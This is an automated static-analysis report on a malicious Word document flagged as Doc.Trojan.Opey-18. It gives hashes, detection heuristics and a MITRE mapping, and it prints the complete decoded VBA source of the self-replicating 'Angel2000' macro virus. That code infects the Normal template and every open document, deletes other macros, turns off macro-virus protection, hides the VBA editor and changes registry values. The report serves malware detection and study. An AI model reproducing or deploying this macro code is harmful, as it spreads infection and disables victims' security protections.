Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aac2723511083206…

MALICIOUS

Office (OLE)

35.5 KB Created: 1997-02-12 15:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c984640b84327f815a742bf68edafdd7 SHA-1: 175294e988716e3ba99282b63fb553ea18539721 SHA-256: aac2723511083206aa6341b9312a6fe66601f8cbcd101cdbad3af2372e146148
188 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as a malicious document by ClamAV with the signature Doc.Trojan.Opey-18. It contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine, which are commonly used to execute malicious code when the document is opened. The VBA script attempts to copy itself and potentially execute further malicious actions.

Heuristics 5

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                    DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4907 bytes
SHA-256: 80acec549a23d3a42782d621e6b1c1c110eddb34fb44bf94f40a591005ab084f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Angel2000"


Attribute VB_Name = "Angel20001"
Sub AutoExec()
    On Error Resume Next
    Call clascopy
    If Month(Date) = 12 Then
        Application.Quit
    End If
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileClose()
    On Error Resume Next
    Call clascopy
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call clascopy
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call clascopy
End Sub
Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    Call clascopy
End Sub
Sub FilePageSetup()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFilePageSetup).Show
End Sub
Sub FilePrint()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFilePrint).Show
End Sub
Sub FileSave()
    On Error Resume Next
    Call clascopy
    ActiveDocument.Save
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub clascopy()
    On Error Resume Next
    Call stealth
    NInfected = False
    For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        modname = NormalTemplate.VBProject.VBComponents(A_A).Name
        If modname = "Angel2000" Then NInfected = True
        If (modname <> "Angel2000") And (modname <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
    Next A_A
    For Each DocOpen In Documents
        DInfected = False
        With DocOpen
            For B_B = DocOpen.VBProject.VBComponents.Count To 1 Step -1
                modname = DocOpen.VBProject.VBComponents(B_B).Name
                If modname = "Angel2000" Then DInfected = True
                If (modname <> "Angel2000") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then Application.OrganizerDelete Source:=DocOpen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
            Next B_B
            If DInfected = False Then
                e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines
                vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e)
                DocOpen.VBProject.VBComponents.Add(1).Name = "Angel2000"
                DocOpen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
                'DocOpen.SaveAs FileName:=DocOpen.FullName
            End If
        End With
    Next DocOpen
    If NInfected = False Then
        e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines
        vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
        NormalTemplate.VBProject.VBComponents.Add(1).Name = "Angel2000"
        NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
        NormalTemplate.Save
    End If
End Sub
Sub stealth()
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.SavePropertiesPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Delete
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "SOFT Group. Copyright(c) 2000"
        .Execute
    End With
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main", _
    "Start Page") = "www.sti.edu.ph"
     System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\WINDOWS\CURRENTVERSION", _
    "RegisteredOwner") = "Avenging Angel :)"
    System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0", "DisplayName") = _
    "Infected with Angel Virus"
End Sub
Sub ToolsMacro()
End Sub
Sub ViewCode()
    Call ToolsMacro
End Sub
Sub ViewVBCode()
    Call ToolsMacro
End Sub